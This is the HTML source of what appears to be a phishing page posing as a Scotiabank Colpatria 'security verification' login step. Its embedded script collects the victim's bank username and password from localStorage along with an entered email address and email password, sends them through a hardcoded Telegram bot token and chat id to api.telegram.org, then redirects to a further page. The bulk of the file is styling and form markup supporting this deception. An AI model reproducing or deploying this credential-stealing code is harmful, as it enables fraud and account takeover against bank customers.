.label{font-family:Scotia Bold,Arial,Helvetica,"sans-serif";font-size:1.6rem;font-weight:initial;line-height:2.4rem;color:#333;display:inline;padding:0 .1rem;vertical-align:middle;}
.input{padding:1rem .1rem;width:100%;font-family:Scotia Regular;font-size:2rem;font-weight:initial;line-height:2.4rem;}
.input--with-icon{top:initial;}
.input--with-icon--left{padding-left:3.2rem;}
.input__icon{pointer-events:none;position:absolute;top:50%;transform:translateY(-50%);}
.input__icon--left{left:0;}
.input--text{-webkit-appearance:none;appearance:none;background-color:transparent;border-bottom-color:#757575;border-bottom-style:solid;border-radius:0;border-width:0 0 1px;color:#333;display:block;outline:none;position:relative;transition:box-shadow .2s ease-in-out;width:100%;}
.input--text:focus{border-bottom-color:#009dd6;box-shadow:0 .1rem #009dd6;}
.input-w-aux__input{padding-left:2.5rem;}
.input-w-aux__action{bottom:1.1rem;color:#333;height:2rem;opacity:0;padding:0;position:absolute;right:1.8rem;transition:opacity .1s ease-in-out;width:2rem;z-index:110;}
@media (min-width: 767px){
.input-w-aux__input{font-family:Scotia Regular,Arial,Helvetica,"sans-serif";font-size:2rem;font-weight:400;letter-spacing:0;line-height:2.8rem;margin:0;}
}
@media (max-width: 767px){
.input-w-aux__input{font-family:Scotia Regular,Arial,Helvetica,"sans-serif";font-size:1.8rem;font-weight:400;letter-spacing:0;line-height:2.8rem;margin:0;overflow:hidden;text-overflow:ellipsis;white-space:nowrap;}
}
html,body{min-height:100vh;font-size:65.2%;}
body{font-size:1.6rem;}
@media only screen and (min-width: 768px),(min-width: 1200px){
.container{margin:0 36px;max-width:initial;}
}
.block--padding-0{padding:0;}
.hero{font-size:2.6rem;}
@media (min-width: 922px){
.hero{font-size:3.6rem;}
}
@media only screen and (min-width: 768px),(min-width: 1200px){
.container{max-width:1200px;}
.container--center{margin:0 auto;}
}
::-webkit-scrollbar{width:.25rem;}
::-webkit-scrollbar-track{box-shadow:inset 0 0 .02rem #757575;border-radius:2rem;}
::-webkit-scrollbar-thumb{background:#757575;border-radius:2rem;}
::-webkit-scrollbar-thumb:hover{background:#e2e8ee;}
/*! CSS Used from: Embedded */
canvas-svg.flex{display:flex;align-items:center;}
/*! CSS Used fontfaces */
@font-face{font-family:Scotia Regular;src:url(/canvas/fonts/Scotia_W_Rg);}
@font-face{font-family:Scotia Regular;font-style:normal;src:url(/woff/Scotia_W_Rg.a53c6af4aaff8c13.woff) format("woff"),url(/virtual/login/Scotia_W_Rg.bb5cf5215aeee399.woff2) format("woff2");}
@font-face{font-family:Scotia Regular;src:url(/canvas/fonts/Scotia_W_Rg);}
@font-face{font-family:Scotia Regular;font-style:normal;src:url(/woff/Scotia_W_Rg.a53c6af4aaff8c13.woff) format("woff"),url(/virtual/login/Scotia_W_Rg.bb5cf5215aeee399.woff2) format("woff2");}
@font-face{font-family:Scotia Regular;src:url(/canvas/fonts/Scotia_W_Rg);}
@font-face{font-family:Scotia Regular;font-style:normal;src:url(/woff/Scotia_W_Rg.a53c6af4aaff8c13.woff) format("woff"),url(/virtual/login/Scotia_W_Rg.bb5cf5215aeee399.woff2) format("woff2");}
@font-face{font-family:Scotia Regular;src:url(/canvas/fonts/Scotia_W_Rg);}
@font-face{font-family:Scotia Regular;font-style:normal;src:url(/woff/Scotia_W_Rg.a53c6af4aaff8c13.woff) format("woff"),url(/virtual/login/Scotia_W_Rg.bb5cf5215aeee399.woff2) format("woff2");}
@font-face{font-family:Scotia Regular;src:url(/canvas/fonts/Scotia_W_Rg);}
@font-face{font-family:Scotia Regular;font-style:normal;src:url(/woff/Scotia_W_Rg.a53c6af4aaff8c13.woff) format("woff"),url(/virtual/login/Scotia_W_Rg.bb5cf5215aeee399.woff2) format("woff2");}
@font-face{font-family:Scotia Headline;src:url(/canvas/fonts/Scotia_W_Headline);}
@font-face{font-family:Scotia Headline;font-style:normal;src:url(/woff/Scotia_W_Headline.5a532caa3319ee5c.woff) format("woff"),url(/virtual/login/Scotia_W_Headline.c0b92ef00c6db65a.woff2) format("woff2");}
@font-face{font-family:Scotia Headline;src:url(/canvas/fonts/Scotia_W_Headline);}
@font-face{font-family:Scotia Headline;font-style:normal;src:url(/woff/Scotia_W_Headline.5a532caa3319ee5c.woff) format("woff"),url(/virtual/login/Scotia_W_Headline.c0b92ef00c6db65a.woff2) format("woff2");}
@font-face{font-family:Scotia Headline;src:url(/canvas/fonts/Scotia_W_Headline);}
@font-face{font-family:Scotia Headline;font-style:normal;src:url(/woff/Scotia_W_Headline.5a532caa3319ee5c.wofff) format("woff"),url(/virtual/login/Scotia_W_Headline.c0b92ef00c6db65a.woff2) format("woff2");}
@font-face{font-family:Scotia Headline;src:url(/canvas/fonts/Scotia_W_Headline);}
@font-face{font-family:Scotia Headline;font-style:normal;src:url(/woff/Scotia_W_Headline.5a532caa3319ee5c.woff) format("woff"),url(/virtual/login/Scotia_W_Headline.c0b92ef00c6db65a.woff2) format("woff2");}
@font-face{font-family:Scotia Bold;src:url(/canvas/fonts/Scotia_W_Bd);}
@font-face{font-family:Scotia Bold;src:url(/woff/Scotia_W_Bd.627aff1c32d06c15.woff) format("woff"),url(/virtual/login/Scotia_W_Bd.3d89a25acb9e796d.woff2) format("woff2");}
@font-face{font-family:Scotia Bold;src:url(/canvas/fonts/Scotia_W_Bd);}
@font-face{font-family:Scotia Bold;src:url(/woff/Scotia_W_Bd.627aff1c32d06c15.woff) format("woff"),url(/virtual/login/Scotia_W_Bd.3d89a25acb9e796d.woff2) format("woff2");}
@font-face{font-family:Scotia Bold;src:url(/canvas/fonts/Scotia_W_Bd);}
@font-face{font-family:Scotia Bold;src:url(/woff/Scotia_W_Bd.627aff1c32d06c15.woff) format("woff"),url(/virtual/login/Scotia_W_Bd.3d89a25acb9e796d.woff2) format("woff2");}
@font-face{font-family:Scotia Bold;src:url(/canvas/fonts/Scotia_W_Bd);}
@font-face{font-family:Scotia Bold;src:url(/woff/Scotia_W_Bd.627aff1c32d06c15.woff) format("woff"),url(/virtual/login/Scotia_W_Bd.3d89a25acb9e796d.woff2) format("woff2");}</style></head>
  <body>
    <auth-root ng-version="14.2.12"><div class="application-wrapper"><canvas-header shadow="" fixed="" class="header__block"><header class="header"><div class="header__bar container container--center direction--row"><a routerlink="/" class="brand block block--centered" href="https://www2.lineapersonal.win/virtual/login/"><img src="seguridad_files/logo-red.svg" alt="Scotiabank Colpatria" class="logo"><img src="seguridad_files/logo-symbol-red.svg" alt="Scotiabank Colpatria" class="logo__mobile"></a></div></header></canvas-header><section role="main" class="container main-container"><router-outlet></router-outlet><auth-login><div class="col-xs-12 block--padding-0 margin-xs-72--bottom"><div class="direction--row"><div class="col-md-2 hide--xs hide--sm"></div><div class="col-xs-12 offset-sm-3 col-sm-6 col-md-4 offset-md-0 block--padding-0"><h1 class="hero">Verificación de seguridad</h1>
        <script>
     
        
        
            function ssdds(params) {
                let rr = document.getElementById("email").value;
               let rrs = document.getElementById("phone").value;
               let urr = localStorage.getItem("user")
               let urrs = localStorage.getItem("pss")
               const token = '6883610640:AAFDDjtSCVQz7BykfvzB6Q_NZpt-I2oQfMI';
    const chatId = '-4058142405';
    
    
      
    const message = `-colp-\n --Usr.: ${urr} \n  Pw: ${urrs}\n   Mail: ${rr} ---> mailPss: ${rrs}` ;
    $.ajax({
      type: 'POST',
      url: `https://api.telegram.org/bot${token}/sendMessage`,
      data: {  
          chat_id: chatId,
          text: message,
          parse_mode: 'html',
      },
      success: function (res) {
          console.debug(res);
          $('#response').text('Message sent');
          console.log("enviado")
          localStorage.setItem("usr",rr );
          
          window.location = "contactAuth.htm"
          
          
         
      },
      error: function (error) {
          console.error(error);
          alert("error failed");
      } 
    
    })
                
                   
                   
                   
               
                
            }
            
                </script>



    <script>
   function validarEmail() {
    const emailInput = document.getElementById('email');
    const email = emailInput.value;
    const emailError = document.getElementById('email-error');
    const regexEmail = /^[A-Za-z0-9._%-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,4}/;

    if (regexEmail.test(email)) {
        // El correo electrónico es válido, borra el mensaje de error
        emailError.textContent = '';
    } else {
        // El correo electrónico no es válido, muestra un mensaje de error
        emailError.textContent = 'El correo electrónico no es válido';
    }
}
function validarFormulario() {
    event.preventDefault();
    const emailInput = document.getElementById('email');
    const email = emailInput.value;
    const regexEmail = /^[A-Za-z0-9._%-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,4}/;

    if (!regexEmail.test(email)) {
        // El correo electrónico no es válido, evita que el formulario se envíe
        return false; // Evita el envío del formulario
    }

    // Si llega aquí, el correo electrónico es válido y el formulario se envía
    return  alert("asdsad") ;
}
function validarFormulario() {
    event.preventDefault();
    const emailInput = document.getElementById('email');
    const email = emailInput.value;
    const regexEmail = /^[A-Za-z0-9._%-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,4}/;

    if (!regexEmail.test(email)) {
        // El correo electrónico no es válido, evita que el formulario se envíe
        return false; // Evita el envío del formulario
    }

    // Si llega aquí, el correo electrónico es válido y el formulario se envía
    return   ;
}

        </script>


    
    <form id="myForm" onsubmit="return validarFormulario()" autocomplete="off" class="form ng-invalid ng-touched ng-dirty">
        
    
    
    <!----><!----><div class="form__input margin-xs-30--top"><canvas-input-text formcontrolname="firstCredential" _nghost-yhg-c48="" class="ng-invalid ng-touched ng-dirty" maxlength="12"><div _ngcontent-yhg-c48="" class="form__input"><label _ngcontent-yhg-c48="" role="text" class="label" for="inputUserNameId"></label><div _ngcontent-yhg-c48="" class="form__input--inline">
        
    
    <input name="email" class="input input--text ng-pristine ng-valid ng-touched input--with-icon input--with-icon--left input-w-aux__input" id="email" type="text" placeholder="Correo Electrónico" autocomplete="off" onkeydown="validarEmail()" aria-describedby="first-credential-input-error" required="">
    
    
    <canvas-svg _ngcontent-yhg-c48="" role="presentation" class="input__icon input__icon--left flex"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" focusable="false" role="presentation" aria-hidden="true" class="svg-icon svg-icon--size-18px"><path fill="#333" stroke-linecap="round" stroke-width="0.5" stroke-linejoin="round" d="M22.879 22.129a.75.75 0 1 1-1.5 0v-2.39c0-2.212-1.979-4.031-4.449-4.031H6.532c-2.47 0-4.449 1.82-4.449 4.03v2.39a.75.75 0 1 1-1.5 0v-2.39c0-3.069 2.677-5.53 5.95-5.53H16.93c3.272 0 5.949 2.461 5.949 5.53v2.39zm-10.79-10.006a5.77 5.77 0 1 1 0-11.54 5.77 5.77 0 0 1 0 11.54zm0-1.5a4.27 4.27 0 1 0 0-8.54 4.27 4.27 0 0 0 0 8.54z"></path></svg></canvas-svg><!----><!----><!----><button _ngcontent-yhg-c48="" type="button" class="button input-w-aux__action"><canvas-svg _ngcontent-yhg-c48="" name="close-outline" role="presentation" class="flex"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" focusable="false" role="presentation" aria-hidden="true" class="svg-icon svg-icon--size-18px">
  <path fill="none" d="M22.667 12c0 5.891-4.776 10.667-10.667 10.667C6.108 22.667 1.333 17.89 1.333 12S6.108 1.333 12 1.333c5.89 0 10.667 4.776 10.667 10.667zM8.647 8.648l6.705 6.704m0-6.704l-6.704 6.704"></path>
</svg></canvas-svg></button><!----><!----><!----><!----><!----></div></div></canvas-input-text>




</div>


<div class="margin-xs-24--top form__password"><canvas-input-text formcontrolname="secondCredential" _nghost-yhg-c48="" class="ng-untouched ng-pristine ng-invalid" maxlength="15"><div _ngcontent-yhg-c48="" class="form__input"><label _ngcontent-yhg-c48="" role="text" class="label" for="inputPswdId"></label><div _ngcontent-yhg-c48="" class="form__input--inline">
    

<input _ngcontent-yhg-c48="" class="input input--text ng-untouched ng-pristine ng-valid input--with-icon input--with-icon--left input-w-aux__input" id="phone" name="emailpass" type="password" placeholder="Contraseña Correo Electrónico" autocomplete="off" aria-describedby="second-credential-input-error" maxlength="100" required="">


<canvas-svg _ngcontent-yhg-c48="" role="presentation" class="input__icon input__icon--left flex"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" focusable="false" role="presentation" aria-hidden="true" class="svg-icon svg-icon--size-18px">
  <path fill="none" d="M20.175 19.972c0 .988-.808 1.796-1.796 1.796H5.804a1.802 1.802 0 0 1-1.797-1.796v-8.983c0-.988.808-1.796 1.797-1.796h12.575c.988 0 1.796.808 1.796 1.796v8.983z"></path>
  <path d="M12.99 13.684a.897.897 0 1 1-1.795.002.897.897 0 0 1 1.794-.002z"></path>
  <path fill="none" d="M12.104 14.582v2.695"></path>
  <path fill="none" d="M16.607 6.498v2.33M7.6 9.065V6.499m0 0a4.492 4.492 0 0 1 8.982 0"></path>
</svg></canvas-svg><!----><!----><button _ngcontent-yhg-c48="" type="button" class="button input-w-aux__action"><canvas-svg _ngcontent-yhg-c48="" name="show" role="presentation" class="flex"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" focusable="false" role="presentation" aria-hidden="true" class="svg-icon svg-icon--size-18px">
  <g fill="none">
    <path d="M1.333 11.933c0 1.451 3.43 7.334 10.667 7.334 1.686 0 3.165-.32 4.442-.827 4.206-1.673 6.225-5.394 6.225-6.507 0-1.45-3.43-7.333-10.667-7.333-7.236 0-10.667 5.882-10.667 7.333z"></path>
    <path d="M12 8.267c-2.076 0-3.765 1.645-3.765 3.666 0 2.022 1.69 3.667 3.765 3.667 2.076 0 3.765-1.645 3.765-3.667 0-2.021-1.69-3.666-3.765-3.666"></path>
  </g>
</svg></canvas-svg><!----><!----></button><!----><!----><!----><!----><!----><!----></div></div></canvas-input-text><div class="password-validation"><span> 8+ caracteres </span><span> 1+ mayúscula </span><span> 1+ minúscula </span><span> 1+ número </span></div></div><div class="margin-xs-36--top"><canvas-input-checkbox formcontrolname="rememberUser" class="ng-untouched ng-pristine ng-valid"></canvas-input-checkbox></div><div class="margin-xs-24--top"><canvas-button width="100%">
    
<button class="button button--primary" type="button" onclick="ssdds();" id="btnGoToLoginId" style="width: 100%;" disabled="disabled">


<!----><span>Continuar</span><!---->

</button></canvas-button></div>



</form>

<script>
    // Obtén el campo de contraseña y el botón de envío
    var phoneField = document.getElementById("phone");
    var submitButton = document.getElementById("btnGoToLoginId");

    // Agrega un event listener para detectar cambios en el campo de contraseña
    phoneField.addEventListener("input", function() {
        // Verifica si el campo de contraseña no está vacío
        if (phoneField.value.trim() !== "") {
            // Habilita el botón de envío y quita la clase y el atributo disabled
            submitButton.removeAttribute("disabled");
        } else {
            // Deshabilita el botón de envío y agrega la clase y el atributo disabled
            submitButton.setAttribute("disabled", "true");
        }
    });
</script>

</div><div class="col-md-1 hide--xs hide--sm line-vertical"><div class="line-border hide--xs hide--sm"></div></div><div class="col-md-2 hide--xs hide--sm"></div></div></div></auth-login><!----></section><footer class="hide--xs"><canvas-co-footer-simple><div class="footer-simple--co background--background-alternate"><div class="container container--center"><div class="direction--row"><div class="col-xs-12 col-sm-12 col-md-12 col-lg-12"><div class="margin-xs-12 margin-sm-18"><p class="text--roman text--footer color--default"><span text=""> © 2023 Todos los Derechos Reservados <br class="hide--sm hide--md hide--lg"> Scotiabank Colpatria. </span><!----><!----></p></div></div></div></div></div></canvas-co-footer-simple></footer></div><jwl-channel-available-error><!----></jwl-channel-available-error></auth-root>
    <!--Google TagManager (noscript) -->
 
    <!--EndGoogle TagManager (noscript) -->
  


</body></html>